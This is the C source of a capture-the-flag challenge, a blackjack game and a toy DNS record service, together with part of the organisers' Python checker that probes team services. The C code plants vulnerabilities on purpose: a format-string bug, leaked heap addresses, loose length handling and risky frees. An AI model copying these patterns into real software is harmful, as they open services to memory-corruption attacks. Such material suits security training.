    printf("|    %c|\n", diamond);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  Q  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Diamond Card
    printf("-------\n");
    printf("|%c    |\n", diamond);
    printf("|  K  |\n");
    printf("|    %c|\n", diamond);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
}// End function
 
int heartcard() //Displays Heart Card Image
{
     
     
   // srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart); 
    printf("|  %d  |\n", k);
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  J  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  A  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  Q  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Heart Card
    printf("-------\n");
    printf("|%c    |\n", heart);
    printf("|  K  |\n");
    printf("|    %c|\n", heart);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int spadecard() //Displays Spade Card Image
{
     
     
   // srand((unsigned) time(NULL)); //Generates random seed for rand() function
    k=rand()%13+1;
     
    if(k<=9) //If random number is 9 or less, print card with that number
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  %d  |\n", k);
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==10) //If random number is 10, print card with J (Jack) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  J  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    }
     
    if(k==11) //If random number is 11, print card with A (Ace) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  A  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    if(player_total<=10) //If random number is Ace, change value to 11 or 1 depending on dealer total
         {
             k=11;
         }
          
         else
         {
             k=1;
         }
    }
     
    if(k==12) //If random number is 12, print card with Q (Queen) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  Q  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
     
    if(k==13) //If random number is 13, print card with K (King) on face
    {
    //Spade Card
    printf("-------\n");
    printf("|%c    |\n", spade);
    printf("|  K  |\n");
    printf("|    %c|\n", spade);
    printf("-------\n");
    k=10; //Set card value to 10
    }
    return k;
} // End Function
 
int randcard() //Generates random card
{
      
                
    // srand((unsigned) time(NULL)); //Generates random seed for rand() function
     random_card = rand()%4+1;
      
     if(random_card==1)
     {   
         clubcard();
         l=k;
     }
      
     if(random_card==2)
     {
         diamondcard();
         l=k;
     }
      
     if(random_card==3)
     {
         heartcard();
         l=k;
     }
          
     if(random_card==4)
     {
         spadecard();
         l=k;
     }    
     return l;
} // End Function   
 
void play() //Plays game
{
      
     int p=0; // holds value of player_total
     int i=1; // counter for asking user to hold or stay (aka game turns)
     char choice3;
     player_total=0;
     dealer_total=0;
     cash = cash;
     cash_test();
     printf("\nCash: $%d\n",cash); //Prints amount of cash user has
     randcard(); //Generates random card
     player_total = p + l; //Computes player total
     p = player_total;
     printf("\nYour Total is %d\n", p); //Prints player total
     dealer(); //Computes and prints dealer total
     betting(); //Prompts user to enter bet amount
        
     while(i<=21) //While loop used to keep asking user to hit or stay at most twenty-one times
                  //  because there is a chance user can generate twenty-one consecutive 1's
     {
         if(p==21) //If user total is 21, win
         {
             printf("\nUnbelievable! You Win!\n");
             won = won+1;
             cash = cash+bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p>21) //If player total is over 21, loss
         {
             printf("\nWoah Buddy, You Went WAY over.\n");
             loss = loss+1;
             cash = cash - bet;
             printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
             dealer_total=0;
             askover();
         }
      
         if(p<=21) //If player total is less than 21, ask to hit or stay
         {         
             printf("\n\nWould You Like to Hit or Stay?");
              
             scanf("%c", &choice3);
             while((choice3!='H') && (choice3!='h') && (choice3!='S') && (choice3!='s')) // If invalid choice entered
             {                                                                           
                 printf("\n");
                 printf("Please Enter H to Hit or S to Stay.\n");
                 scanf("%c",&choice3);
             }
 
 
             if((choice3=='H') || (choice3=='h')) // If Hit, continues
             { 
                 randcard();
                 player_total = p + l;
                 p = player_total;
                 printf("\nYour Total is %d\n", p);
                 dealer();
                  if(dealer_total==21) //Is dealer total is 21, loss
                  {
                      printf("\nDealer Has the Better Hand. You Lose.\n");
                      loss = loss+1;
                      cash = cash - bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  } 
      
                  if(dealer_total>21) //If dealer total is over 21, win
                  {                      
                      printf("\nDealer Has Went Over!. You Win!\n");
                      won = won+1;
                      cash = cash+bet;
                      printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
                      dealer_total=0;
                      askover();
                  }
             }
             if((choice3=='S') || (choice3=='s')) // If Stay, does not continue
             {
                printf("\nYou Have Chosen to Stay at %d. Wise Decision!\n", player_total);
                stay();
             }
          }
             i++; //While player total and dealer total are less than 21, re-do while loop 
     } // End While Loop
} // End Function
 
void dealer() //Function to play for dealer AI
{
     int z;
      
     if(dealer_total<17)
     {
    //  srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
      z=rand()%13+1;
      if(z<=10) //If random number generated is 10 or less, keep that value
      {
         d=z;
          
      }
      
      if(z>11) //If random number generated is more than 11, change value to 10
      {
         d=10;
      }
      
      if(z==11) //If random number is 11(Ace), change value to 11 or 1 depending on dealer total
      {
         if(dealer_total<=10)
         {
             d=11;
         }
          
         else
         {
             d=1;
         }
      }
     dealer_total = dealer_total + d;
     }
           
     printf("\nThe Dealer Has a Total of %d", dealer_total); //Prints dealer total
      
} // End Function 
 
void stay() //Function for when user selects 'Stay'
{
     dealer(); //If stay selected, dealer continues going
     if(dealer_total>=17)
     {
      if(player_total>=dealer_total) //If player's total is more than dealer's total, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }
      if(dealer_total>21) //If dealer's total is more than 21, win
      {
         printf("\nUnbelievable! You Win!\n");
         won = won+1;
         cash = cash+bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }      
      if(player_total<dealer_total) //If player's total is less than dealer's total, loss
      {
         printf("\nDealer Has the Better Hand. You Lose.\n");
         loss = loss+1;
         cash = cash - bet;
         printf("\nYou have %d Wins and %d Losses. Awesome!\n", won, loss);
         dealer_total=0;
         askover();
      }

     }
     else
     {
         stay();
     }
      
} // End Function
 
void cash_test() //Test for if user has cash remaining in purse
{
     if (cash <= 0) //Once user has zero remaining cash, game ends and prompts user to play again
     {
        printf("You Are Bankrupt. Game Over");
        //cash = 500;
        exit(0);
        //askover();
     }
     if(cash>=WIN_SUM){
     	int id;
     	int length;
     	char buffer[100];
     	char *key=0;
     	id = open("/home/tsctf/flag/flag",O_RDONLY,S_IRUSR );
     	if(id <0){
     		printf("flag file error~!\n");
     		exit(0);
     	}
     	length = read(id,buffer,100);
     	if (length<0){
     		printf("read error~!\n");
     		exit(0);
     	}
     	buffer[length] = '\0';
     	length = strlen(buffer);
     	key = malloc(length);
     	for(int i =0 ; i<length;i++){
     		//printf("%d ",key[i*4]);
     		key[i]=(rand()%256);
     	}
     	//printf("%d",(length/4)*4);
     	for(int i = 0;i<length;i++){
     		//printf("%2x",key[i]);
     		buffer[i] = buffer[i]^key[i];
     	}
     	puts("d(`･∀･)b	:");
     	puts("		OK, you win,");
     	puts("I won't give u real flag :");
        write(1,buffer,length);
     	close(id);
     	exit(0);
     }
} // End Function
 
int betting() //Asks user amount to bet
{
 printf("\n\nEnter Bet: $");
 scanf("%u", &bet);
 
 while ((bet > cash) || (bet == 0))//If player tries to bet more money than player has
 {
        printf("\nAre you kidding me? ");
        printf("\nEnter Bet: ");
        scanf("%u", &bet);
        //return bet;
 }
return bet;
} // End Function
 
void askover() // Function for asking player if they want to play again
{
    char choice1;
         
     printf("\nWould You Like To Play Again?");
     printf("\nPlease Enter Y for Yes or N for No\n");
     scanf("\n%c",&choice1);
 
    while((choice1!='Y') && (choice1!='y') && (choice1!='N') && (choice1!='n')) // If invalid choice entered
    {                                                                           
        printf("\n");
        printf("Incorrect Choice. Please Enter Y for Yes or N for No.\n");
        scanf("%c",&choice1);
    }
 
 
    if((choice1 == 'Y') || (choice1 == 'y')) // If yes, continue.
    { 
          //  system("clear");
            play();
    }
  
    else if((choice1 == 'N') || (choice1 == 'n')) // If no, exit program
    {
        //fileresults();
        printf("\nBYE!!!!\n\n");
        //system("pause");
        exit(0);
    }
    return;
} // End function
 
void fileresults() //Prints results into Blackjack.txt file in program directory
{
    FILE *fpresults; //File pointer is fpresults
    fpresults = fopen(RESULTS, "w"); //Creates file and writes into it
    if(fpresults == NULL) // what to do if file missing from directory
    {
               printf("\nError: File Missing\n");
               //system("pause");
               exit(1);
    }
    else
    {     
     fprintf(fpresults,"\n\t RESULTS");
     fprintf(fpresults,"\n\t---------\n");
     fprintf(fpresults,"\nYou Have Won %d Times\n", won);
     fprintf(fpresults,"\nYou Have Lost %d Times\n", loss);
     fprintf(fpresults,"\nKeep Playing and Set an All-Time Record!");
    } 
     fclose(fpresults);
     return;
} // End Function

void handler(){
	puts("[-] Time out ... \n");
	exit(1);
}

void init() {
    char *logo =
	"*******************************************\n"
	"*  _____   _____   _____   _____   _____  *\n"    
	"* |_   _| /  ___/ /  ___| |_   _| |  ___| *\n"    
	"*   | |   | |___  | |       | |   | |__   *\n"
	"*   | |   \\___  \\ | |       | |   |  __|  *\n"   
	"*   | |    ___| | | |___    | |   | |     *\n"
	"*   |_|   /_____/ \\_____|   |_|   |_|     *\n" 
	"*                                         *\n"
	"* ------ Welcome to TSCTF FINAL --------- *\n"
	"* ------     Have a nice day    --------- *\n"
	"*  _____   _   __   _       ___   _       *\n"      
	"* |  ___| | | |  \\ | |     /   | | |      *\n"     
	"* | |__   | | |   \\| |    / /| | | |      *\n"     
	"* |  __|  | | | |\\   |   / / | | | |      *\n"     
	"* | |     | | | | \\  |  / /  | | | |___   *\n"  
	"* |_|     |_| |_|  \\_| /_/   |_| |_____|  *\n"
	"*******************************************\n"
		"\n";
    puts(logo);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
	setvbuf(stderr,0,2,0);
    signal(14,handler);	
	alarm(200);
    srand((unsigned) time(NULL)/60);
    visitor_name = malloc(8);
    strcpy(visitor_name,"anonym");
}

void menu(){
    puts("==GOD.ZE DNS Server==");
    puts("1. Login");
    puts("2. Add a DNS item");
    puts("3. Parsing domain names ");
    puts("4. Delete  DNS item");
    puts("5. Exit");
    puts("=====================");
}

void menu1(){
    puts("=====MENU======");
    puts("1. set name");
    puts("2. set motto");
    puts("3. show motto");
	puts("4. Exit");
    puts("===============");
}
void maybe_real_set_name(){
	scanf("%7s",visitor_name);
	puts("OK, I know your name :");
	printf(visitor_name);
}
void set_name(){
	maybe_real_set_name();
}
void set_motto(){
	char buffer[0x200] ;
	read_n(buffer,0x200);
	motto = strdup(buffer);

}

int login(){
	if (login_flag != 0)
		return -1;
	char * fmt = "%d";
	int opt;
	while(1){
		printf(">");
		if(scanf(fmt,&opt)<=0){
			exit(0);
		}
		switch(opt){
			case 1:
				if((login_flag & 0x01)==0){
					login_flag = login_flag|0x01;
					printf("name:");
					set_name();
				}
				break;
			case 2:
				if((login_flag &0x10) == 0){
					login_flag = login_flag|0x10;
					printf("motto:");
					set_motto();
				}
				break;
			case 3:
				if((login_flag &0x100) == 0){
					login_flag = login_flag|0x100;
					if(motto!=0)
					puts(motto);
				}
				break;	
			case 4:
				return 0;
				break;
			default:
				puts("invalid options\n");

		}
	}
}

int read_n(char *src,int len){
  unsigned int i;
  for ( i = 0; i < len; i++ )
  {
    if ( read(0, (void *)(i + src), 1) != 1 )
      exit(-1);
    if ( *(src+i) == 10 )
    {
      *(src+i) = 0;
      return i;
    }
  }
  return i;	
}
int read_int(){
	char nptr[16];
	read_n(nptr, 0xA);
  	return (unsigned int)atoi(nptr);
}
int check_format(char *ip){
	int num =0;
	for(int i=0;i<0x20;i++){
		if(ip[i]=='.'){
			num += 1;
		}
	}
	if(num!=3){
		return -1;
	}
	return 0;
}

void add_DNS(){
	struct DNS_Node * tmp;
	unsigned int len,i;
	char *remark;
	for ( i = 0; i <= 31 && DNS_Node_List[i]; ++i )
		;
	if ( i == 32 )
		return 0xFFFFFFFFLL;
	tmp = malloc(sizeof(struct DNS_Node));
	printf("ψ(｀∇´)ψ: Let me leave some clue [%03x]\n",((unsigned int)tmp&0xfff));
	strcpy(tmp->user,visitor_name);
	printf("input domain: ");
	read_n(tmp->domain,0x30);
	printf("input length:");
	len =read_int();
	remark = malloc(len+0x20);
	printf("ψ(｀∇´)ψ: Let me leave some clue [%03x]\n",((unsigned)remark&0xfff));
	tmp->ptr = remark;
	printf("input remark:");
	read_n(remark+0x20,len);
	printf("input IP:");
	read_n(remark,0x20);
	if(check_format(remark)!=0){
		printf("error input,bye!\n");
		exit(0);
	}
	DNS_Node_List[i]=tmp;
	printf("Complete\n");

}

void parse_domain(){
	char domain[0x30];
	struct DNS_Node *tmp=0;
	int i;
	printf("Give me ur domain:");
	read_n(domain,0x30);
	for ( i = 0; i <= 31; ++i )
	{
		if ( DNS_Node_List[i] && !strcmp(domain, DNS_Node_List[i]->domain) )
		{
			tmp = DNS_Node_List[i];
			printf("adder : %s\n",tmp->user );
			printf("IP    : %s\n",tmp->ptr );
			printf("remark: %s\n",(tmp->ptr + 0x20));
			printf("---------------------------\n");
    	}
  	}
  	if ( !tmp )
    	puts("not find!!");	
}

void delete_DNS(){
	char domain[0x30];
	struct DNS_Node *tmp;
	int i,zero,j;
	printf("Give me bad domain:");
	read_n(domain,0x30);
	zero = 0;
	for ( i = 0; i <= 31; ++i )
	{
		if ( DNS_Node_List[i] && !strcmp(domain, DNS_Node_List[i]->domain) && !strcmp(visitor_name,DNS_Node_List[i]->user) )
		{
			zero = 1;
			tmp = DNS_Node_List[i];
			j=i;
			free(tmp->ptr);
			free(tmp);
    	}
  	}	
  	if(zero){
  		DNS_Node_List[j]=0;
  		printf("complete\n" );
  	}
  	else{
  		puts("not find!!");
  	}

}


void main(){
    asm(
        "shr $0x16,%rsp\n"
        "shl $0x16,%rsp\n"
        "xor $0x188,%rsp\n"
        "push %rbp\n"
        "mov %rsp,%rbp\n"
        "sub $0x20,%rsp\n"
    );
    int option;
	init();
	//menu();
	while(1){
		menu();
		printf(">");
		if(scanf("%u",&option)<=0){
			exit(0);
		}
		switch(option){
			case 1:
				menu1();
				login();
				break;
			case 2:
				add_DNS();
				break;
			case 3:
				parse_domain();
				break;
			case 4:
				delete_DNS();
				break;
			case 5:
				puts("=͟͟͞͞ =͟͟͞͞ ﾍ( ´Д`)ﾉ :");
				puts("              [Don't leave me alone, I can give u sh311 !]");
				puts("              ");
				exit(0);
				break;
			case 0xbabe:
				game();
				break;


		}
		//login();
		//game();
	}
}


/*
NODE -> USER(8) + DOMAIN(0X30) +PTR(8)
CONTENT -> DNS(0X20) + CONTENT(~)

*/
c

Checker

#!/usr/bin/env python
# coding=utf-8

from pwn import *
import random
import thread
import string
import hashlib
import requests
import os
from termcolor import *
import json
import time
coding_check_level = 1
fmt_check_level = 0
log_file = 'note_check'
debug = 0
check = False
file_path = '/home/tsctf/binary/pwn'#/Desktop/DNS_Server'
if debug:
    round_time = 300
    slog = 1
else:
    round_time = 300
    slog = 0


class TimeoutError(Exception):
    def __init__(self, err='timeout'):
        Exception.__init__(self, err)


class ResponseError(Exception):
    def __init__(self, err='ErrResponse'):
        Exception.__init__(self, err)


class Checker:
    """
    function checker for Question Note
    """

    def __init__(self, _rhost, _port, _timeout):
        # pwntools init
        global context
        global slog
        context.log_level = 'ERROR'
        if slog:
            context.log_level = 'DEBUG'
        if _timeout:
            context.timeout = _timeout

        # check result init
        self.state = 0

        # local variables init
        self.rhost = remote(_rhost, _port)
        self.name = ''
        self.oip = _rhost
        self.oport = _port

    def randstr(self, length=10):  # generate random string with lowercase
        result = ''
        space = string.lowercase
        for i in range(length):
            index = random.randint(0, len(space) - 1)
            result += space[index]
        return result

    def md5(self, inputstr):
        return hashlib.md5(inputstr).hexdigest()
    def check_login(self):
        data = self.rhost.recvuntil('=====================\n>')
        if not data:
            print_log(colored('[Error] outoftime : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise TimeoutError
        self.rhost.sendline("1")
        self.rhost.recvuntil("===============\n>")
        self.rhost.sendline("1")
        self.rhost.recvuntil("name:")
        name = self.randstr(7)
        self.rhost.sendline(name)
        self.rhost.recvuntil('OK, I know your name :\n')
        recv = self.rhost.recvuntil(">")
        if name not in recv:
            print_log(colored('[Error] in login_set_name : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError
        if ((name+'\n') in recv)&(fmt_check_level!=0):
            print_log(colored('[Error] bad patch format vul : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError            
        self.rhost.sendline('2')
        self.rhost.recvuntil('motto:')
        motto = self.randstr(0x200)
        self.rhost.send(motto)
        self.rhost.recvuntil('>')
        self.rhost.sendline('3')
        if motto not in self.rhost.recvuntil(">"):
            print_log(colored('[Error] in login_show_motto : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError        
    def add(self,domain,length,remark,ip): 
        self.rhost.recvuntil('>')    
        self.rhost.sendline('2')
        self.rhost.recvuntil("domain:")
        #domain_2 = self.randstr(0x30)
        self.rhost.sendline(domain)
        self.rhost.recvuntil("length:")
        self.rhost.sendline(str(length))
        self.rhost.recvuntil("remark:")
        #remark_2 = self.randstr(0x90)
        self.rhost.sendline(remark)
        self.rhost.recvuntil("input IP:")
        self.rhost.sendline(ip)
    def delete(self,domain):
        self.rhost.recvuntil('>')    
        self.rhost.sendline('4')
        self.rhost.recvuntil('domain:')
        self.rhost.sendline(domain)
    def parse(self,domain):
        self.rhost.recvuntil('>')    
        self.rhost.sendline('3')
        self.rhost.recvuntil('domain:')
        self.rhost.sendline(domain)

    def check_DNS(self):
        data = self.rhost.recvuntil('=====================\n>')
        if not data:
            print_log(colored('[Error] outoftime : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise TimeoutError
        self.rhost.sendline("1")
        self.rhost.recvuntil("===============\n>")
        self.rhost.sendline("1")
        self.rhost.recvuntil("name:")
        name = self.randstr(7)
        self.rhost.sendline(name)
        self.rhost.recvuntil('OK, I know your name :\n')
        self.rhost.recvuntil(">")
        self.rhost.sendline('4')  
        # add    

        domain_1 = self.randstr(0x30-1)
        domain_2 = self.randstr(0x30-1)
        remark_1 = self.randstr(0x50-1)
        remark_2 = self.randstr(0x90-1)
        remark_3 = self.randstr(0x110-1)
        self.add(domain_1,0x50,remark_1,"127.0.0.1")
        self.add(domain_1,0x90,remark_2,"127.0.0.1")
        self.add(domain_2,0x110,remark_3,"0.0.0.0")
        self.parse(domain_1)
        self.rhost.recvuntil("adder : ")
        if name not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError               
        self.rhost.recvuntil("IP    : ")
        if "127.0.0.1" not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    
        self.rhost.recvuntil("remark: ")
        if remark_1 not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    
        self.rhost.recvuntil("adder : ")
        if name not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError               
        self.rhost.recvuntil("IP    : ")
        if "127.0.0.1" not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    
        self.rhost.recvuntil("remark: ")
        if remark_2 not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError 

        self.parse(domain_2)
        self.rhost.recvuntil("adder : ")
        if name not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError               
        self.rhost.recvuntil("IP    : ")
        if "0.0.0.0" not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    
        self.rhost.recvuntil("remark: ")
        if remark_3 not in self.rhost.recvline():
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    


        self.delete(domain_2)
        self.parse(domain_2)
        if "not find!!" not in self.rhost.recvuntil("==GOD"):
            print_log(colored('[Error] in parse : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError    
    def get_num(self):
        self.rhost.recvuntil('Your Total is ')
        return int(self.rhost.recvline()[:-1])
    def get_money(self):
        self.rhost.recvuntil("Cash: $")
        return int(self.rhost.recvline()[:-1])
    def round(self):
        self.money = self.get_money()
        if (self.money!= self.pre_money):
            print_log(colored('[Error] in game : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError                
        self.rhost.recvuntil("Bet: $")
        self.rhost.sendline('1')
        self.rhost.recvuntil('Please Enter H to Hit or S to Stay.')
        self.rhost.sendline('H')
        while (1):
            num = self.get_num()
            tmp = self.rhost.recv()
            #print '[+]',tmp,'[-]'
            if 'Would You Like to Hit or Stay?' in tmp:
                self.rhost.sendline("H")
            elif 'Enter Y for Yes or N for No' in tmp:
                win_num = int(tmp.split(' Wins and ')[0][-1:])
                loss_num = int(tmp.split(' Wins and ')[1][:1])
                if self.win < win_num:
                    self.win = win_num
                    return 1
                if self.loss < loss_num:
                    self.loss = loss_num
                    return -1
            else:
                tmp = self.rhost.recv()
                #print '[+]',tmp,'[-]'
                if 'Would You Like to Hit or Stay?' in tmp:
                    self.rhost.sendline("H")
                elif 'Enter Y for Yes or N for No' in tmp:
                    win_num = int(tmp.split(' Wins and ')[0][-1:])
                    loss_num = int(tmp.split(' Wins and ')[1][:1])
                    if self.win < win_num:
                        self.win = win_num
                        return 1
                    if self.loss < loss_num:
                        self.loss = loss_num
                        return -1                

    def check_game(self):
        data = self.rhost.recvuntil('=====================\n>')
        if not data:
            print_log(colored('[Error] outoftime : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise TimeoutError
        self.win = 0
        self.loss = 0
        self.money = 5
        self.pre_money = 5
        self.rhost.sendline(str(0xbabe))
        self.rhost.recvuntil("(Y/N)")
        self.rhost.sendline("y")
        self.rhost.recvuntil("Choice:")
        self.rhost.sendline("1")
        for i in range(3):
            self.pre_money += self.round()
            self.rhost.sendline('y')


    def check_heap(self):
        data = self.rhost.recvuntil('=====================\n>')
        if not data:
            print_log(colored('[Error] outoftime : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise TimeoutError
        self.rhost.sendline('2')
        self.rhost.recvuntil("[")
        addr_1 = int(self.rhost.recvuntil(']')[:-1],16)
        self.rhost.recvuntil("domain:")
        self.rhost.sendline("p4nda")
        self.rhost.recvuntil("length:")
        self.rhost.sendline(str(0x58))
        self.rhost.recvuntil("[")
        addr_2 = int(self.rhost.recvuntil(']')[:-1],16)       
        if (addr_2-addr_1)!=0x50:
            print_log(colored('[Error] in heap : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError              
        self.rhost.recvuntil("remark:")
        self.rhost.sendline("p4nda")
        self.rhost.recvuntil("input IP:")
        self.rhost.sendline("1.1.1.1")
        #test 1
        self.rhost.recvuntil(">")        
        self.rhost.sendline('2')
        self.rhost.recvuntil("[")
        addr_3 = int(self.rhost.recvuntil(']')[:-1],16)
        if(addr_3-addr_2)!=0x80:
            print_log(colored('[Error] in heap : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError                     
        self.rhost.recvuntil("domain:")
        self.rhost.sendline("dubhe")
        self.rhost.recvuntil("length:")
        self.rhost.sendline(str(0x110))
        self.rhost.recvuntil("[")
        addr_4 = int(self.rhost.recvuntil(']')[:-1],16)       
        if (addr_4-addr_3)!=0x50:
            print_log(colored('[Error] in heap : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError              
        self.rhost.recvuntil("remark:")
        self.rhost.sendline("p4nda")
        self.rhost.recvuntil("input IP:")
        self.rhost.sendline("1.1.1.1")     
        #test 2 
        self.delete("p4nda")
        self.rhost.recvuntil(">")
        self.rhost.sendline('2')
        self.rhost.recvuntil("[")
        addr_3 = int(self.rhost.recvuntil(']')[:-1],16)
        if(addr_3!=addr_1):
            print_log(colored('[Error] in heap : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError           
        self.rhost.recvuntil("domain:")
        self.rhost.sendline("p4nda")
        self.rhost.recvuntil("length:")
        self.rhost.sendline(str(0x58))
        self.rhost.recvuntil("[")
        addr_4 = int(self.rhost.recvuntil(']')[:-1],16)       
        if(addr_2!=addr_4):
            print_log(colored('[Error] in heap : ' + self.oip + '\n', 'red'),ip=self.oip)
            raise ResponseError               
        self.rhost.recvuntil("remark:")
        self.rhost.sendline("p4nda")
        self.rhost.recvuntil("input IP:")
        self.rhost.sendline("1.1.1.1")        


    def function_check(self):
        try:
            self.check_login()
            self.rhost.close()
            self.rhost = remote(self.oip, self.oport)
            self.check_DNS()
            #self.rhost.close()
            #self.rhost = remote(self.oip, self.oport)
            #self.check_game()
            self.rhost.close()
            self.rhost = remote(self.oip, self.oport)   
            self.check_heap()
            self.rhost.close()          
        except Exception as e:
            print e
            try:
                self.rhost.close()
            except Exception as e:
                pass
            self.state = 1

    def getResult(self):
        return self.state


def check(ip, port):
    """
    function: check workstate with single ip
    :return: 
        check result
        format {'ip': "127.0.0.1", 'status', 0} 
        0 stands for normal and 1 stands for down
    """
    try:
        checker = Checker(ip, port, 10)
        checker.function_check()
        return checker.getResult()
    except Exception as e:
        if debug:
            print e
        if 'invalid literal for int() with base 10:' in e :
            return 0
        return 1


def upload(check_server, payload):
    #print payload
    r = requests.post(check_server, data=payload)
    print r.text


def log(filename, str):
    f = open(filename + ".log", 'ab')
    f.write(str)
    f.close()


def print_log(info,ip=""):
    print info
    log(log_file, info + "\n")
    if ip!="":
        if not os.path.exists('./checkresult/'):
            os.makedirs('./checkresult/')         
        log('./checkresult/'+ip+'.log','['+time.asctime( time.localtime(time.time()) )+']  '+ info + "\n")

def CalcMD5(filepath):
  with open(filepath,'rb') as f:
    md5obj = hashlib.md5()
    md5obj.update(f.read())
    hash = md5obj.hexdigest()
    #print(hash)
    return hash
def patch_check(file_path,standard,oip):
    #print "in"
    f = open(file_path,"rb")
    f_standard  = open(standard,'rb')
#main 0x3370 - 0x325a
    f.seek(0x325a,0)
    f_standard.seek(0x325a,0)
    standard_tmp = f_standard.read(0x3370-0x325a)
    md5obj = hashlib.md5()
    tmp = f.read(0x3370-0x325a)
    md5obj.update(tmp)
    hash_tmp = md5obj.hexdigest()
    md5obj = hashlib.md5()
    #tmp = f.read(0x28f0-0x1273)
    md5obj.update(standard_tmp)
    hash_standard = md5obj.hexdigest()    
    if (hash_tmp!=hash_standard):
        f.close()
        print_log(colored('[Error] in patch main : ' + oip + '\n', 'red'),ip=oip)
        return 0        
# init 0x29D6 0x2AB6
    f.seek(0x29D6,0)
    f_standard.seek(0x29D6,0)
    standard_tmp = f_standard.read(0x2AB6-0x29D6)
    md5obj = hashlib.md5()
    tmp = f.read(0x2AB6-0x29D6)
    md5obj.update(tmp)
    hash_tmp = md5obj.hexdigest()
    md5obj = hashlib.md5()
    #tmp = f.read(0x28f0-0x1273)
    md5obj.update(standard_tmp)
    hash_standard = md5obj.hexdigest()    
    if (hash_tmp!=hash_standard):
        f.close()
        print_log(colored('[Error] in patch init : ' + oip + '\n', 'red'),ip=oip)
        return 0   
# menu 0x2AB7 0x2b03
    f.seek(0x2AB7,0)
    f_standard.seek(0x2AB7,0)
    standard_tmp = f_standard.read(0x2b03-0x2AB7)
    md5obj = hashlib.md5()
    tmp = f.read(0x2b03-0x2AB7)
    md5obj.update(tmp)
    hash_tmp = md5obj.hexdigest()
    md5obj = hashlib.md5()
    #tmp = f.read(0x28f0-0x1273)
    md5obj.update(standard_tmp)
    hash_standard = md5obj.hexdigest()    
    if (hash_tmp!=hash_standard):
        f.close()
